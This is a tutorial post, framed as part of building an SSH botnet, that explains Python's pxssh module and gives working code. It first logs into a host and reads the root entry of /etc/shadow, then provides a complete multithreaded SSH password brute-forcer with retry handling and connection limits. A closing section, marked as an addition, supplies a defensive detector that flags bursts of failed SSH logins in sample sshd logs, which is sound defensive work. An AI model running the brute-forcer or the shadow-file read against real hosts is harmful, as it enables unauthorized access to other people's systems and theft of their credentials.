
[Advanced Python Scripts] 2.2. Building an SSH botnet (part 2): using pxssh to brute-force SSH passwords


Contents

1. Brute-forcing SSH passwords with pxssh

1.1 Functions

1.2 Simplifying with pxssh

1.3 Functions

1.4 Automation


1. Brute-forcing SSH passwords with pxssh

1.1 Functions

prompt(): in JavaScript, a method whose main purpose is to display a prompt dialog box. In pxssh, prompt() instead waits until the remote shell prompt appears.

pxssh: a module used in Python to open remote SSH connections, run commands and return the results. It does not support Windows.

1.2 Simplifying with pxssh

pxssh simplifies the script further. pxssh is a specialized script included with the pexpect library; it provides ready-made functions such as login(), logout() and prompt() for interacting with SSH directly. With pxssh, the previous script can be reduced to:

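from pexpect import pxssh  # pxssh ships as part of the pexpect package


def send_command(s, cmd):
    # Send the command, wait for the shell prompt, then print the output.
    s.sendline(cmd)
    s.prompt()
    print(s.before.decode())


def connect(host, user, password):
    # Log in over SSH and return the session; exit on any failure.
    try:
        s = pxssh.pxssh()
        s.login(host, user, password)
        return s
    except Exception:
        print('[-] Error Connecting')
        exit(0)


s = connect('127.0.0.1', 'root', 'toor')
send_command(s, 'cat /etc/shadow | grep root')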

1.3 Functions

BoundedSemaphore(n): allows at most n threads to access a particular resource at the same time.

global: declares that a name refers to a global variable.

release: releases the semaphore.

add_option: adds a command-line option.

acquire: a built-in method of the Lock class in Python's threading module.

Thread: a thread of execution in the program.

1.4 Automation

With a few more changes, the script can carry out the SSH password brute-forcing automatically. Apart from adding some argument-parsing code to read the hostname, the user name and the file containing the passwords to try, only the connect() function needs to be modified slightly.

If login() succeeds and no exception is thrown, the script prints a message saying that the password has been found and sets the global Boolean that records this to True. Otherwise, the exception is caught. If the exception shows that the password was refused, the password is wrong and the function simply returns. However, if the exception message contains "read_nonblocking", the SSH server may have been overwhelmed by the large number of connections, so the script waits a moment and tries again with the same password. Likewise, if the exception shows that pxssh had trouble extracting the command prompt, the script waits for a while and then tries again.

connect() takes a Boolean parameter, release. Because connect() can call itself recursively, only the connect() call that was not made recursively may release the connection_lock semaphore.

from pexpect import pxssh  # pxssh ships as part of the pexpect package
import optparse
import time
from threading import BoundedSemaphore, Thread

maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0


def connect(host, user, password, release):
    global Found
    global Fails
    try:
        s = pxssh.pxssh()
        s.login(host, user, password)
        print('[+] Password Found: ' + password)
        Found = True
    except Exception as e:
        if 'read_nonblocking' in str(e):
            # Socket timeout: count it, wait, then retry the same password.
            Fails += 1
            time.sleep(5)
            connect(host, user, password, False)
        elif 'synchronize with original prompt' in str(e):
            # pxssh could not extract the prompt: wait briefly and retry.
            time.sleep(1)
            connect(host, user, password, False)
    finally:
        # Only the non-recursive call releases the semaphore.
        if release:
            connection_lock.release()


def main():
    parser = optparse.OptionParser('usage %prog ' + '-H <target host> -u <user> -F <password list>')
    parser.add_option('-H', dest='tgtHost', type='string', help='specify target host')
    parser.add_option('-F', dest='passwdFile', type='string', help='specify password file')
    parser.add_option('-u', dest='user', type='string', help='specify the user')
    (options, args) = parser.parse_args()
    host = options.tgtHost
    passwdFile = options.passwdFile
    user = options.user
    if host is None or passwdFile is None or user is None:
        print(parser.usage)
        exit(0)
    fn = open(passwdFile, 'r')
    for line in fn.readlines():
        if Found:
            print("[*] Exiting: Password Found")
            exit(0)
        if Fails > 5:
            print("[!] Exiting: Too Many Socket Timeouts")
            exit(0)
        # Blocks while maxConnections attempts are already in flight.
        connection_lock.acquire()
        password = line.strip('\r\n')
        print("[-] Testing: " + str(password))
        t = Thread(target=connect, args=(host, user, password, True))
        t.start()


if __name__ == '__main__':
    main()
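
Seen from the server, the guessing loop above shows up in the sshd log as a burst of "Failed password" lines for one account from one source address. The following is an added example, not part of the original article, that counts those lines in a sliding window; the log lines are constructed samples in the OpenSSH syslog format, and the function name, threshold, window and year are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines (documentation addresses, not real logs).
SAMPLE_LOG = """\
Mar  3 10:00:01 bastion sshd[2101]: Failed password for root from 203.0.113.7 port 40110 ssh2
Mar  3 10:00:02 bastion sshd[2102]: Failed password for root from 203.0.113.7 port 40112 ssh2
Mar  3 10:00:03 bastion sshd[2103]: Failed password for root from 203.0.113.7 port 40114 ssh2
Mar  3 10:00:05 bastion sshd[2104]: Failed password for root from 203.0.113.7 port 40116 ssh2
Mar  3 10:00:08 bastion sshd[2105]: Failed password for root from 203.0.113.7 port 40118 ssh2
Mar  3 10:00:12 bastion sshd[2106]: Failed password for root from 203.0.113.7 port 40120 ssh2
Mar  3 10:00:30 bastion sshd[2110]: Failed password for invalid user admin from 192.0.2.9 port 5001 ssh2
Mar  3 10:01:10 bastion sshd[2111]: Failed password for alice from 198.51.100.20 port 6001 ssh2
Mar  3 10:01:18 bastion sshd[2112]: Accepted password for alice from 198.51.100.20 port 6002 ssh2
Mar  3 10:05:30 bastion sshd[2120]: Failed password for invalid user admin from 192.0.2.9 port 5002 ssh2
Mar  3 10:10:30 bastion sshd[2130]: Failed password for invalid user admin from 192.0.2.9 port 5003 ssh2
Mar  3 10:15:30 bastion sshd[2140]: Failed password for invalid user admin from 192.0.2.9 port 5004 ssh2
Mar  3 10:20:30 bastion sshd[2150]: Failed password for invalid user admin from 192.0.2.9 port 5005 ssh2
"""

FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+")


def find_bruteforce(log_text, threshold=5, window_seconds=60, year=2024):
    """Return {(ip, user): peak failures inside one window} for offenders."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # (ip, user) -> failure times still in window
    flagged = {}
    for line in log_text.splitlines():
        m = FAILED.match(line)
        if not m:
            continue              # successful logins and other sshd messages
        # Classic syslog timestamps carry no year, so one is assumed.
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        key = (m["ip"], m["user"])
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:  # drop failures that aged out of the window
            q.popleft()
        if len(q) >= threshold:
            flagged[key] = max(flagged.get(key, 0), len(q))
    return flagged


if __name__ == "__main__":
    print(find_bruteforce(SAMPLE_LOG))
```

With the default 60-second window only the rapid burst against root is reported; the five failures spaced five minutes apart are caught only when the window is widened.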

